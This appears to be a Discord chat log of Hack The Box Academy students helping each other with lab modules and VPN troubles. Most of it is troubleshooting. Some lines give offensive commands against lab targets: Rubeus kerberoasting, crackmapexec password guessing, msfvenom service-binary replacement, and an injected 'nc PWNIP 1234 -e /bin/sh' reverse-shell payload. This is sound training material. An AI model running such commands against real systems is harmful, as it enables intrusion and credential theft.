the pwnbox doesn't run on your network, it runs in a browser on htb's infrastructure

as safe as any other website

it'd really be on your IT team to deem if it's okay or not accessing HTB from company resources

is anyone else getting this error?

could be an ad blocker

Man, the "getting started" module is hard lol.

it's only uphill from there. prepare yourself

dont worry. It gets harder

Be able to get in the mindset of "did I read everything"

I'm tired, gonna go out to eat...

You think i didn't try i contact them but they are smoking something weird there i don't know

Well we won't hack your account back

Ok then thank you for your time

Reaching out to Steam is your only recourse

Ah NN as well, additional negative for you

Go take your 88 elsewhere

You mean speaking with a stuff or something?

Reaching out to legitimate steam support

They're a neonazi btw or at least trying to be edgy with their profile

Do you have a link or something because i only speak with a bot on a email

Nope

i switched to firefox when this happen, didnt fix then i just reset my pc got on firefox and found the academy tab

I'm struggling to progress in the Windows attack and defense module. I tried running the Rubeus application through the command prompt, but it failed; the application seemed to start but then immediately closed. Has anyone else encountered this issue? (i am trying to open it after launching rdp)

can you show a screenshot of the command and error

no error message and the command I used is start C:\Users\bob\Download\Rubeus.exe

you don't need to do start

it's a precompiled binary

you can just call it normally

also

i think it's Downloads not download

but i could be wrong

looks like it's silent erroring and not telling you file not found

do u have any prior experince with the cmd? @daring totem

no error message for this either and I used start C:\Users\bob\Downloads\highway_to_hell-master\Rubeus,exe

yeah I spelt downloads on the previous message wrong but I did type it in with the s at the end like you mentioned

is that the filepath

also .exe not ,exe

it's likely silent erroring on you

meaning no feedback on if it's working or not

typo again i typed it to fast

it is a .

do this: cd to the downloads directory

cd to the directory that Rubeus is in

do ./Rubeus.exe

alternatively you can start it without using the start command

For the Attacking Common Applications Skills Assessment 1, I'm having trouble figuring out how the correct CVE or searchsploit or msfconsole option is found.

I tried

Did not work, just gave some code from one of the pages that was useless.

Tried a couple of others but nothing was useful even though it was matching the exact version.

Then in the walkthrough they just pull a random CVE out of the hat and it works?!

Frustrating. I feel like the portion of finding out which exploit to use either wasn't covered, or the expectations were not clear as to how many different options would have to be tried first.

Well, reverse it - look at why the exploit they chose was right

perhaps they used an exploit that wasn't for a specific version rather a range of versions < N

I have no idea, they used completely different gobuster methodology than in the module too.

Glad these walkthroughs are here now otherwise I would be sifting for a while for the right exploit

is this a common issue?

no idea

just offering other ideas

There are over 30

¯_(ツ)_/¯

then likely your enumeration was just off

The enumeration led me specifically to a shortlist in searchsploit, but none of them worked. Searching in metasploit only pulled up one which did not work. The one used in the walkthrough seems like it was picked out of a hat.

That's fine I'll just roll with it.

I just wish they explained how they got there since it wasn't in the module

ill help u find where the tool is located

have u just tried doing .\Rubeus.exe kerberoast /outfile:spn.txt in the Downloads folder

.\Rubeus.exe kerberoast /outfile:spn.txt in Powershell
or
Rubeus.exe kerberoast /outfile:spn.txt from CLI
both work. But not too sure on what he is actually doing to run Rubeus since they have not posted screenshot

fr

lowkey think he should learn the basics of cmd first

I suggested that earlier to them

yeah i saw

seems like he just jumped to zero experince to somewhat advanced topic

time to do AEN BLIND

Goodluck

hey guys, it says target is spawning but I am waiting for 20 minutes and it`s still spawning, does anybody have the same issue?

same

same here

use EU 2 vpn

Write a report while you're at it!

Refresh the page? Try a different VPN?

it spawned eventually, but took quite some time

thanks

Hi guys, I'm doing the windows os module and on the question that asks "Find the non-standard directory in the C drive. Submit the contents of the flag file saved in this directory." what exactly does that mean? I put in the command that lets me see the tree of folders and files and I know what file the question is talking about but idk how I'm supposed to submit contents of it

Standard directories would be Windows, Program Files, Users, etc. So which directory isn't supposed to be there by default?

That would be Academy right?

Are you asking or did you look?

Well there you go.

Cool remove the spoiler 😉

But when I submit it I get told it's incorrect

hi im in module WINDOWS EVENT LOGS & FINDING EVIL
section Analyzing Evil With Sysmon & Event Logs
question 1,
already follow the step to replicate DLL hijack with calc.exe and reflective_dll.x64.dll, its work to show popup mainDLL
but in my event viewer don't trigeer event ID 7.

make sure no extra spaces etc

Make sure you modify the sysmon config as explained in the section

ah, ok

yeah I got it thanks both you and gubarz

hey guys, currently on Introduction to Malware analysis module, debugging section. there is some resources we need to download on our host cause they're not in pwnbox or target windows vm. How did you transfer those resources from your host to pwnbox and then to target windows vm? copy-paste or drag-drop doesn't work on my end

can't pwnbox reach the internet and download it directly there?

Hi. I've got a question related to the Password Attacks module.

On the page I've linked, they've mentioned two modes within John the Ripper: Single Crack Mode and Wordlist Mode. Under Single Crack Mode they mention the --wordlist option, as well as the --rules option. These two options are once again mentioned under the Wordlist Mode.

I'm struggling to see the difference between the two modes. Is there really a difference? If so, could you please explain?

Thank you 🙂

Was there something specific or just in general?

files are not hosted on a website, it's in the resources section of the module

the module is on a website though?

gotcha. gonna login to hackthebox account on pwnbox. you could ve said directly that would be more clear as to understand . thanks

Well I didn't know it was the resources from htb

are you trolling?

the --wordlist argument allows you to choose a wordlist file. the --rules argument applies rules from a file that contains rules for john to follow.

No. Your original message never said it was from the resources section of HTB, it just said you had to download some resources so I didn't connect the two together.

Hi. Yes, I've understood what the flags do, I'm just wondering if there's a difference between the two modes since the two options (wordlist and rules) can be used with both.

Those are two arguments that can be used while using the single crack mode.

According to the section, they can also be used with Wordlist Mode.

I said it right after

actually nm

re-reading this i'm wrong, single crack mode appears to just use the built in wordlist for john

its wordlist mode that uses the wordlist, and then there's incremental mode

tbh i've never used the built in list

I see, so the only real difference between the two is that Single Crack Mode uses a default wordlist but allows you the option to specify a custom wordlist, whereas Wordlist Mode requires you to specify a wordlist?

i pretty much use wordlist mode

that seems to be it

but wordlist mode also allows you to apply rules

not sure if it can be done in single crack mode based on what module

ohhhhhh i see

the rules for john works different than hashcat

it just mangles the passwords so it probably can be used with single crack mode

Could you please clarify if my understanding on Incremental Mode is correct?

Incremental Mode tries every possible combination of a specified charset? And if not specified, it uses the default charset (a-zA-Z0-9)?

it will increment all characters. For example it will start with AAAAA, then go BAAAA, CAAAA

... ZZZZX, ZZZZZ

it increments through all characters

extremely time consuming, essentially brutce forcing the password

So if the password is 8 digits, does it start from just one digit first, tries everything, then moves onto two digit combinations and so on?

Until its tried all possible 8 digit combinations using the charset.

yeah looks like it'll try all possible characters from the set

Thanks for your help.

so better than a pure brute force

Incremental mode generates the guesses on the fly, while wordlist mode uses a predefined list of words. At the same time, the single crack mode is used to check a single password against a hash

that kinda sums it up

then the --rules will apply extra rules, for example it may replace A with @

or E with 3

Sorry, but how is it better than poor brute force? Is it because it increments from smallest to largest and not randomly?

no because a brutce force attack is completely blind and just starts from zero incrementing up. john takes a characters from the charset

so the charset will probably have less characters inside of it, while a brutce force uses all characters possible

honestly the john page probably can explain it all better and more accurately https://github.com/openwall/john/blob/bleeding-jumbo/doc/MODES

and here's more about the rules https://github.com/openwall/john/blob/bleeding-jumbo/doc/RULES

I see. Thanks a lot.

i went to your youtube and tbh it's kinda bad. some of your videos also have watermarks as if you stole them instead of making them yourself.

nah

my videos only
any hacker is here?

even your logo is stolen

module : Injection attack
skill assessment

I have found internal hosts running on target through /etc/hosts

but don't know how to access it

i made it myself

ass

https://lens.google.com/search?ep=gisbubb&hl=en&re=df&p=AbrfA8ojBozBKXbPKr45T2A5BhvrURjTF8JnMcabnN6zoGwoSctNeThVFGCX0oO-vB082__O_9QDVYqwjsJgAjdtnu43yUqIomcdnEpTJPdoRmGzja0MseBcyUPm_yHlgI0CNm61NbUkoF7LUqgqY7mlMUSiKVpv6A6OTVMApx73_oEmLrSAX-u1mRZb8cVWfWK4H8yq_LMG1BP4Gw%3D%3D#lns=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsIkVrY0tKR0pqT1dGaFpXTTVMV014TVRNdE5EUm1PUzA0TUdZNExUSTJPVFk0Tmpka01UZ3paUklmYzNjd2ExaFNUbXA2TWtGaFZVTm1hVWxtYTFwaVJFUk9NWE5LUWkxb1p3PT0iXQ==

mad lol

i took the model but i keep my name

uh huh

and your youtube videos where you stole videos that have watermarks along with 'your' logo? got an excuse for that one?

stealing assets? no way bruh, you wouldn't download a car

rhx is my brother

we both post same video

<@&861185840277487616>

Hi,

I am doing Medium lab of "Attacking Common Services". I managed to find 5 open TCP ports.
Out of them, I tried anonymous login, default credentials and password bruteforcing(using user list and password list provided in the Resources section) for FTP server but failed.
I have got the zone file from the DNS server but that is not much help.
I tried enumerating the usernames in POP3 server, but it gives OK response even for the wrong usernames. I tried bruteforcing the password using hydra, but I get ERR Disconnected for inactivity during authentication. error after a while.

I checked the forum and it says that we should be able to find 6 open TCP ports. I tried resetting the machine and waited for 5 minutes before scanning again. But all I get is 5 ports. I am now running nmap full port scan(-p-). However, over time it shows increasing trend of remaining time. It currently shows 2:10:25 remaining. Am I missing something? What am I doing wrong?

What's your nmap command?

https://academy.hackthebox.com/module/112/section/1078
Footprinting Lab - Easy

Not sure whether I am correctly connected. Tried switching VPN.. Any ideas? Shouldn't there be atleast some ports available?

I am using the following command:

nmap -v --disable-arp-ping -n -Pn -p- {target_ip} -oN full.nmap

Make sure your IP is correct and that you're connected to the VPN. Try restarting the lab. Try switching to a different VPN.

You running that with sudo/root?

Nope

Give that a try or adding -T4

also try using the EU servers

I am using the pwnbox with lowest latency:

I see Increasing send delay for 10.129.47.248 from 5 to 10 due to max_successful_tryno increase to 6 messages in the verbose output of nmap and while overall remaining time for nmap has decreased after using -T4 flag, there is still increasing trend in remaining time:

I'm referring to the vpn servers, that's where the target actually spawns at

Oh. I am currently using EU-Academy-1

hmm if the scan is still wrong, switch the pwnbox server to EU too so that the latency between pwnbox and the target will be the lowest

The remaining time is decreasing right now. So, I will just wait a little and see how that goes. Thanks for the help!

I'd try to keep the two geographically as close as possible

I buy cubes as I complete the modules and need more. I do not have student subscription. So, no hints🤐

Hints aren't for every question and they are still there. The walk through which is barely a couple weeks old has always only been for annual subscriptions.

Thanks it worked - I cannot seem to progress with the task.

I've tried the following:

||Full Nmap port scan, found 4 open ports (21, 22, 53, 2121)

• Tried anonymous login on 21 and 2121
• Tried logging in with the user:pass provided on 21 and 2121 - no files on the ftp server.
• Tried connecting on port 22 using the provided credentials - Permission denied (public key) -> tried with -o PreferredAuthentications=password but didnt make a difference.
• Tried enumerating DNS zones and doing zone transfers to int.inlanefreight.htb (and others) but without luck.
• Tried numerous other enumeration on the ports||

What could I possibly have missed?

Determine the IP address of the C2 (Command and Control) server and enter it as your answer. I can't figure out what artifacts I should be looking for here. Can anyone give a hint?

Reread what might be the obvious way forward, maybe you'll get what you need all at once.

How would you pull stats for an IP and which direction do you want?

@fathom pendant pls help here
I am totally stucked

Morning buddys

i tried netstat got nothing

I'm not sure how netstat is related to the question when Splunk is provided.

velociraptor it's not related to splunk ( DIGITAL FORENSICS)

Ah, thought you were on a different question that uses splunk or maybe it's elastic. It's late and I don't have those notes on me.

got my first CVE

so happy and hyped

where I can find Linux attack machine ip (MS01) to use for solving the lab? https://academy.hackthebox.com/module/143/

Is it a good one? How long on the project did it take to find?

i hope it's a good one. took me some hours

Best of luck it's not a dup!

Hello gentlemen!

it's not. i got it confirmed

oh i'm dumb. wr0ong channel

when i try to upload .json file on bloodhound all files uploded except this one

any idea why i am having this issue

.\sharphound.exe -c all

The latest sharphound does not work with “older” bloodhound and this is the error you get when you combine them. Use a older sharphound collector (<2.0) or a newer bloodhound

If you start sharphound it tells you for which version it is

i will look into it , but i installed latest only today

both

you're using the legacy version, the newer sharphound is only compatible with the community edition

no one? author says that a parrot and a windows machine are provided to the user to connect using xfreerdp, but I can't find ip

It depends

... because it's just an info section and there's nothing to attack, you'll get the ip in the following sections once you spawn the targets

One of the sections details that some scenarios have a parrot box on 172.16.5.225 if I'm recalling, but they'll tell you that

Hi, sorry if this is not the rght place to ask but I need help with the Dante Pro-lab. Not so much with cracking it (I'm 25% through at the moment) but more wondering why it is that I have to go back and repeat steps (or does everhting have to be re-done if someon resets the lab?). What channel / where can I ask this? The interface of the discord isn't particularly clear. Also are the labs suffering grom connectivity issues at the moment. I can;t get anything working.

Read and follow #welcome , there's a #prolabs-dante channel you can access after

thanks!

Windows Priv Esc - Citrix Breakout (can't connect to target).
I've logged in to the portal using the pmorgan credentials, but when I try to connoect to the virtual desktop I get an error sayinging that "an error occured wihle mkaing the requested connection." I dowloaded linuxx86 zip file when I first vistied the site, but I was wondering why I can't connect. I've seen there's a launch.ica file that I might have to have, but I can't find it amongst the extracted files. If anyone could help I'd greatly appreciate it

@fathom pendant aaaaaae congrants

no backspace button 😔😔

i'm answering this question because using parrot instance on web I can't reach 172.16.5.0/23 target

Well no

You connect to the 10.129.x.x target

Then either pivot or connect through that target

You don't have direct access to that subnet just from the vpn/pwnbox alone

Note: Double click on .ica file to open with Citrix Receiver Engine.

[Encoding]
InputEncoding=UTF8

[WFClient]
CPMAllowed=On
ProxyFavorIEConnectionSetting=Yes
ProxyTimeout=30000
ProxyType=Auto
ProxyUseFQDN=Off
RemoveICAFile=yes
TransparentKeyPassthrough=FullScreenOnly
TransportReconnectEnabled=On
VSLAllowed=On
Version=2
VirtualCOMPortEmulation=Off

[ApplicationServers]
Default $P5=

[Default $P5]
Address=10.13.38.15:1494
AutologonAllowed=ON
BrowserProtocol=HTTPonTCP
CGPAddress=*:2598
ClearPassword=E362BFFF6FD12E
ClientAudio=On
DesiredColor=8
DesiredHRES=640
DesiredVRES=480
DoNotUseDefaultCSL=On
Domain=\08532F0AC3339E9B
FontSmoothingType=0
InitialProgram=#Default $P5
LPWD=15
LaunchReference=441882447C2E5E7351AEC1C6F450B2
Launcher=WI
LocHttpBrowserAddress=!
LogonTicket=E362BFFF6FD12E08532F0AC3339E9B
LogonTicketType=CTXS1
LongCommandLine=
NRWD=1123
ProxyTimeout=30000
ProxyType=Auto
SFRAllowed=Off
SSLEnable=Off
SessionsharingKey=-0gdQzE/Jw88B6/WlHfcfzD
StartIFDCD=1711008070667
StartSCD=1711008070667
TRWD=15
TWIMode=Off
Title=Default
TransportDriver=TCP/IP
UILocale=en
WinStationDriver=ICA 3.0

[Compress]
DriverNameWin16=pdcompw.dll
DriverNameWin32=pdcompn.dll

[EncRC5-0]
DriverNameWin16=pdc0w.dll
DriverNameWin32=pdc0n.dll

[EncRC5-128]
DriverNameWin16=pdc128w.dll
DriverNameWin32=pdc128n.dll

[EncRC5-40]
DriverNameWin16=pdc40w.dll
DriverNameWin32=pdc40n.dll

[EncRC5-56]
DriverNameWin16=pdc56w.dll
DriverNameWin32=pdc56n.dll

Are you experiencing problems with lab connectivity?

yup, getting "Request Validation Failed" every time I try launching an instance.

it launches the instance correctly and gives me IP, but when I launch an ICMP packet I have no connectivity.

oh wow, well you're getting further than me

jajaja

Which VPN are you using?

Some targets may not respond to pings

even if I run an nmap scan it doesn't work either.

Are you using the -Pn flag?

I've tried several just incase the VPN maintenance was the issue

I am asked to apply port scanning with nmap

Try EU?

yu[

I am using EU

I tried UK

That's pwnbox region

Not vpn

Good point

Eu-academy-1

I mean I was trying to pwnbox... didn't feel like logging in on my kali box. I'll try connecting to another VPN on my Kali box.

Vpn still matters with pwnbox

Vpn = targets
Pwnbox region = pwnbox spawn

sorry but I've tried installing it but I still can't find the the .ica file. Is it already on the linux host? I tried using find cmd to search for it and nothing came up

You double click the .ica file on the host you connect to, not on your own box. If the .ica file doesn't exist you can create your own using the code I posted.

That module and that ica connection is shaky. I had to respawn that module a lot to finish studying it.

So you don't need to install anything.

your box->spawned machine->.ica connection to target

Hello! I am currently doing section "Protected Files" of "Password attacks" module. It requires to use ssh2john.py script, which does not work with the python version installed in pwnbox (python - 3.9.2).
Please update ssh2john.py to the latest version (i just downloaded the latest from github).

I'm rlly sorry but I made the .ica file and tried connecting, but it just hangs. I looked throuhg the file and it's not like I need to change the IP of the windows machine I'm trying to connect to.

Still no labs working?

Try respawning the machine, waiting a few minutes for it to do it's slow ass loading on the backend, double click the ica, and then wait a while. It's slow af.

alr, I appreciate your patience

If this doesn't work poke support.

👍

<@&861185840277487616>

try eu2, there were some network problems with the US vpns

gotcha

I have tried eu 1 and eu 2 and it doesn't work....

how do i use hack the box from ubuntu

Download vpn

how

Log into your account

Click download vpn

i have

via VPN, just like any other VM

aight

sudo openvpn ./yourvpnfile.ovpn

https://academy.hackthebox.com/vpn for academy

Or the "connect to htb" button in the top right of the main site

Hey I am doing Windows Privilege Escalation > SeDebugPrivilege and towards the end of the page they recommend to use the SeDebugPrivilegePoC from https://github.com/daem0nc0re/PrivFu/tree/main/PrivilegedOperations/SeDebugPrivilegePoC But I don't really get how to use this. Do I have to compile the poc into an exe or how do I make it into some kind of application.

Some googling led me to this repo where someone has compiled it. https://github.com/Sentinal920/Pentest-Tools/tree/master Would still like to know how to do this myself.

Probably with vscode

Or some other compiler

yeah probably, but that's for an other time

I'm unsure if anyone else has used this for the module**/158/section/1427** creating a reverse shell through Reverse Port Forwarding on the Windows host.

Using Invoke-WebRequest for me didn't work and I tried quite a few other file download requests and none seemed to download from the ubuntu server.

Instead of wasting time on web requests, on the Windows host I used Internet Explorer, added the Ubuntu web server address into the "Trusted Sites" settings for IE and I could download the payload file no problem.

Just thought I'd share that in the event some people have struggled with that section

i can't find this in new CE bloodhound

is there no 0x0410 in list of process security rights? is it typo of 0x0400?
this is from YARA & SIGMA FOR SOC ANALYSTS section Developing Sigma Rules
https://learn.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights
am i missing something here or is it combining flags or

i'm very confused i bitwise OR 0x0400 and 0x0010 it is 0x0410
where is 0x1010 coming from it claims its a combination of both but i dont see how itresults in 0x1010

module windows pirivlege escaltion / weak permissions what is the problem when we look at the screenshot?

did you stop the service before replacing its file? sometimes it breaks if you didn't

i will try it again

Does anyone know why this happens?

findstr /SIM “Password” *.xml
FINDSTR: Out of memory

back to my problem: module windows pirivlege escaltion / weak permissions, is it right that you have to make the malicious binary for yourself with msfvenom and than you replace it right...?

Yes, you have to make a binary with msfvenom and then copy it to replace it with the legitimate one.

alright. when i do that, then i have can't start it again.

i have always:
sc start SecurityService
[SC] StartService FAILED 1053:

Once you do that, if you start the service again it should run your binary

Even if it gives an error, it should be executed if it is correctly replaced.

ah ok

thx

🤨
if you can get powerup in there, it will replacee the binary with one that adds a user into the admin group so you could rdp with it
i see this error but the user gets added

you're trying to find an xml file contianing the string password in the whole file system, that's a lot of files to go through so it ran out of memory

but something does not work...

you added a user? oh, you're in the admin group
your command prompt must be run as admin

ups, thanks forgot to run it with admin privs

aa okey

Pulling powershell “Get-ChildItem” if it works

Hey, I'm currently on the Shells & Payloads module in the "The Live Engagement" section. I managed to get host 1 but only after looking at the hint. I could not find the credentials for my life and I tried running default credentails of tomcat but that did not work and I can't understand how as I supposed to find those credentials

hi, great day to you all, i am having issues with a room, i think its a very silly mistake from me, but i cannot solve the Linux fundamentals question where it asks How many total packages are installed on the target system?, could you please advice?

I had a lot of pain in that mudle because I was using the vpn end every thing I was trying faild. The reason was the connection when I tried from the PwnBox evrything worked. I don't know if could be your case

should be on the desktop or one of the config files

what command are you using to find the packages

thats the thing, i don't even know how to look for them, i was using find and locate

google ubuntu list installed pacakges

Maaan are you serious! How did I miss that lmao

They should probably tell you that you have the credentials on your desktop cause wow I lost way too much time on this lol

I mean, it is in the hint

True but I did waste a bunch of time before checking the hint lol

ty, dumb me was so focused, i forgot google,

Hi All, I'm trying to redo the Pass The Ticket using only Rubeus. I can dump the ticket since shouldn't require any extra privilage. When I try to run rubens ptt /ticket etc to load the dumped ticket I get a permission denied. Is that expect? I'm already local adm.

Can someone please help me with instagram account! Thats very important!

Hi all,

Do any of the 3 skills assessment labs at the end of the Password Attacks module require using credentials from previous labs in the password attacks module?

no

Took me an hour before i took a step back and questioned why they gave us the 4th machine and if maybe there is something on it

how come Intro to Web Apps comes before Web Requests in the Infosec Foundations path ?

but then if you read the description of the Web Apps module, you are supposed to do Web Requests first no ?

No

No

scam much ban his ahh

Message support idk

how do i get to post images and get access to general in the server

verify your account bruddhah #welcome

ty

If my user htb-student is in child.inlanefreight.ad domain , but it belongs to *Svc_Admins * group in the parent domain inlanefreight.ad , does that mean I am DA on inlanefreight.ad ? Or what does Svc_Admins group do?

I've tried everything since yesterday night (vpn switch and waited for a long time) and the citrix instance still isn't spawning. I can spend more time debugging, but if it's a known issue, then I'll just skill for now

From what ive seen ppl cant connect on usa vpns.
They went to eu and it worked.

ok, i am trying apt list --installed | wc -l, so it tells me how many packages are installed, but still says wrong answer

i may be omiting something

run it without wc -l and look at the first few lines, notice anything extra?

Or replace wc -l with head and see what's going on

"listing..."?

ooo

yup, it's a red team cert

yes exactly lol, that's what i ended up doing. thxs!

Apperently they doing some changes in the backend, should be done in a couple of days hopefully

gotcha, it's no big deal

I am on EU academy 1. This VPN doesnt seem to work. How can I fix this?

Change vpn regions

EU 2 seems to be most stable rn

okay doing so

even this doesnt seem to work. been like this for 2 mins.

I take it when you switch vpn regions you.

1. close current connection attempt
2. delete old file
3. download new file

yes. I replace the ovpn file

I think I should stick to pwnbox while they fix the issues

¯_(ツ)_/¯

Speak with support too

am I supposed to email or there is a channel for that?

Green bubble bottom right of academy page

(Disable adblock)

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

There is no dedicated support on discord

okay thanks

Hi im doing ATTACKING COMMON SERVICES , Attacking SMB
Question 2 "What is the password for the username "jason"?"
I have done this one "crackmapexec smb 10.129.203.6 -u jason -p pws.txt --local-auth" but I dont understand what I am supposed to do help me please

Looks right to me

What exactly isn't working?

You're not providing any errors for us to work with

Is there a way / place to ask for a review in a module content? I did the DACL II module and the GPO Attack section on linux shows a tool called GPOwned, the author said no tool on linux right now can create / link gpo, I made a PR to this tool and got aproved that enable both creation and linkink

I also advise adding | grep "+"

When i do it I do not get any correct answers?
looks like this all the way
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:12345qwert STATUS_LOGON_FAILURE

Well

The [-] means negative/failure

So by grepping for + or doing an inverse grep for STATUS_LOGON_FAILURE will only show the positive results

I solved it I had edited the pws.txt file by mistake

missing passwords in list

That'll do it

I got the 10.129.203.6-GGJ_id_rsa on my desktop but when i try to ssh I get the Permission denied (publickey).

Do i need to input it somehow?

Yes

-i [rsa_file]

Make sure the permissions are correct too

This right "chmod +wx 10.129.203.6-GGJ_id_rsa"

Nope

You need to make it so only you can read the file

I'd look into octal notation for file permission

owner | group | other
r(read) = 4
w(write) = 2
x(execute) = 1
add together for file permissions
744 = everyone can read, only owner can edit/execute

Is it the permssion for 10.129.203.6-GGJ_id_rsa I need to fix?

I thinks is chmod 400

but i dont get it to work

also tried 600 but didnt work

Any number +00 should work

Also make sure it's the right user you're trying to ssh to

i did chmod 600 10.129.203.6-GGJ_id_rsa

then ssh jason@10.129.203.6 -i 10.129.203.6-GGJ_id_rsa

not working

"Not working"

That's not descriptive

Is it giving an error of some sort

Is the target still alive?

jason@10.129.203.6: Permission denied (publickey).

yeah

I take it you did get <file> when you downloaded it

I'd try redownloading the file and trying again

I did now use get

not*

for the skills assessment in sqlmap essentials, is there supposed to be a clue in how the website reacts to when i send a specific string to know what sqlmap tamper scripts to use

I dont get how to get the file

does it give an error when you try to get the file

we talk about smbmap right?

for this

i just dont know the command at all

i cant figure it out

dowload dosnt work

If you connect with smb it's as simple as going into the share folder and doing get file

along with what @fathom pendant just said, this may help explain things:

https://www.computerhope.com/unix/smbclien.htm

smbclien.html

Im looking for it but I really cant find any way to use get with smbclient

Is it possible to mount /TechSupport from a specific port or doesn't that matter? I'm unable to view/open the currently mounted drive.

when I do the command smbmap -H 10.129.203.6 -r "GGJ/id_rsa" i get the file onto my desktop

is that wrong?

On password attacks networks services how did u guys fix the smb invalid reply from target error

also trying this but not working

smbclient -U jason ////10.129.198.209//GGJ
Password for [WORKGROUP\jason]:
do_connect: Connection to failed (Error NT_STATUS_NOT_FOUND)

@inner geyser @fathom pendant

try backslashes

For forward slashes you don't need to double up

It's either \\\\ip\\share OR //ip/share

The reason is because \ is an escape character

\\ reads it as a single \ and discord even uses it as well (this is double \)

can someone help with this

No idea i just fucked around and used what was given in the module to mess with

It's a combination of techniques

did you have to use several tamper scripts together

I really don't remember, I didn't take many notes on this module as I usually do. Need to go back and add notes

I remember prefix and some other stuff

It was like prefix, tamper, and technique that were used

i got the flag but now its not accepting it

Try making sure no extra white spaces

did that

if you have the correct flag, it will accept it

so you either didn't input it correctly or you don't have the flag

Or the flag is being output weird

figured this out by using udp vpn file instead of tcp.

Module: File Inclusion
Section: Skill assessment
I have Fuzzed everything and I haven't found a way to get file inclusion or path traversal. I am curious about the contact page because that's the only way I can input. Can some one give me a hint?

I would guess something to do with it trying to add to the administrato's group on the child domain instead of the parent domain, because in your screenshot htb-student is a part of child.inlanefreight.ad and you're trying to add a user to the inlanefreight.ad domain. I haven't done this module so I have no idea and someone else can probably provide a better answer, but I don't see anything in your commands telling it to add the user to the parent domain's group.

You may want to review the local file inclusion section. You're looking for a page that has a parameter at the end where you fuzz/modify the value.

Click on all links on the page until you find a parameter being input

Ok I think I have all of them that have parameters will check again

I wonder if I'm digging to much

you might be, it's kinda surface level

just click all the links and keep an eye on the url where you may be able to change the value of a parameter

ok

No, you don’t. You only have to use between. You always wanna start from the base and work your way up so first try nothing at all and then try it with a tamper script or anything else that was mentioned in the module

Is there a linux equivalent of the "Windows Event Logs & Finding Evil" module?

hi

every can someone help

On the Attacking Common Applications Skills Assessment II, the vhost is not resolving to the ip, even though it is in my /etc/hosts file

They give the ip and

show a screenshot of your /etc/hosts and the victim ip

But the IP is the only thing that actually opens any site, the gitlab.inlanefreight.local doesn't work

Should I reset?

Also, it's asking for the URL of the Wordpress instance, there wasn't any wordpress instance.

type nslookup gitlab.inlanefreight.local and show me the results

or just getent hosts gitlab.inlanefreight.local

you can even just do a simple ping to make sure it's resolving, most likely it is and it's something else

dig gitlab.inlanefreight.local +short

Now I see what the problem is

I should have been using inlanefreight.local, not gitlab.inlanefreight.local

you need both

you need all the vhosts

I checked the walkthrough for the part about the Wordpress since there was no wordpress and I apparently need to use gobuster?

I don't remember what section that was in

gobuster is just a web enumeration tool

like ffuf

what the ffuf

Yeah, I've used it plenty, I like it more than ffuf, I'll just have to go back and find where that is in this module

I only have gobuster in my notes for tilde enumeration and the Tomcat section

Nothing saying I need to fuzz for vhosts!!!

Nothing for ffuf in this one

I'm stumped.

I don't want to just follow the walkthrough for this one.

Okay so even the walkthrough isn't accurate, I checked the fuzzing command and it's not giving me the expected output

This is the full list

¯_(ツ)_/¯

if you have complaints about the walkthrough: #1234357888114364508

The wc is almost 5000

¯_(ツ)_/¯

Distinguishing between creating and adding a user is important. GenericAll over a group allows you to directly modify group membership of the group so you can add a user into that group. However, you cannot create a new user into the domain with this right.
Additionally, this is considered as a spoiler for other students, so it’s advisable to remove it.

Thanks, posted to erratum

fyi i was able to access gitlab.inlanefreight.local without issue only adding that to my /etc/hosts file

so could be their instance is bugged

its possible, but he didn't run the command to see if the host resolved which was the initial problem. accessing the website is another thing, it doesn't run on port 80 for example.

but as long as the host is in /etc/hosts it should resolve to that ip you set, unless something is wrong with your box

the beginning of the module also says it will use several vhosts throughout the module which should be in /etc/hosts https://academy.hackthebox.com/module/113/section/1087

which includes the blog site

It's acting strange, I have it in my /etc/hosts, but I have to manually enter the port

mine redirected automatically. using firefox

holeeeeeeey moley

It's defaulting to 8081, when the nmap scan showed 8180

that was fun

yes i completed it

It automatically tacks on the 8180 for some reason

I mean 8081

When I manually enter 8180 it works fine with either the ip or the gitlab.inlanefreight.htb

weird

I tried resettting and it's doing the same weird thing with the port

¯_(ツ)_/¯

i'm pretty sure the gitlab instance is on port 80

i didn't do anything special for that url

i could be misremembering what i did a few mins ago though haha

This is what I get when I put in 8180 manually

It automatically goes to the sign in page

ahh okay. i'm probably misremembering then.

oh yeah for the gitlab one yes, it wasn't on port 80

but it redirected me np

Okay, I figured it out, had to clear web cache

It's resolving correctly now

Still doesn't solve my gobuster issue

I tried the attackbox and it worked there

Could it be my vpn connection?

On Active Directory Attacks & Enumeration Skills Assessment 1, and can't figure out why one hash can be cracked and the other cannot. At first I thought it was an issue with hashcat/john versions on my machine, so tried it in PwnBox. Cracked the hash. So then I copied the hash from PwnBox to my machine, cracked the hash with hashcat. Both hash files look identical and I ensured no additional spaces were in either file using the following command:

echo 'insert hash here' | tr -d "[:space:]" > hash_to_crack_file

I can show a screenshot of the 2 hashes as a quick comparison but wasn't sure if that would be considered spoiler-y. Any ideas why my first hash is giving me a 'token length exception' error?

Your hash format is broken in some manner or you're using the wrong mode

Yeah i'm sure the hash is broken but considering I obtained the hash the same exact way in both instances and used the same mode, it's pretty irritating. I'll have compare them line-by-line somehow

Hey guys, I'm curious. Is there a way to have access to a pivot host's network after another proxychain hop?
What do I mean by that:
Hosts:
A - Attack host
B - Pivot host
C - Target host

proxychains.conf file:
...
socks5 127.0.0.1 1080
socks5 127.0.0.1 1090

Logic: A ==tunnel with socks on 1080== B ==tunnel with socks on 1090== C

After creating the second tunnel and specifying the proxy in the proxy file, when I try to nmap back to the pivot host It show's me that it is down.
Is there a way so that I can always access hosts from each subnet? (assuming that all those hosts have their own)

sometimes nmap/ICMP doesn't work well through proxychains

You have access to C through B's proxychain. Are you trying to connect to network D that only C has access to?

**Windows Priv Esc Skills Assessment I **
I can get cmd injection with whoami, but when I try to use nc I can't get a request. I also tried using curl with an http server but that failed too. Here is the cmd I'm using. I'd greatly appreciate a little help.
|| 127.0.0.1 | nc PWNIP 1234 -e /bin/sh ||

https://www.revshells.com/

try a shell from here

You are on the right track but you are using Linux commands on windows box

trueeee I'm actually so dumb

Can anyone assist me, I don’t know what to do on how to pass this section

scroll down. any questions that you need to answer?

scroll down

there should be a "click here to spawn target" button

Yes i spawned the target

and above the first question should be instructions ssh to ip with username "username" and password "password"

Yes it is

SSH to the target using the provided command

reading the question will be more helpful to figuring out what you need to do

I am trying

neither of your screesnhots have the question in them

the questions will be near where you spawned the target on the academy page

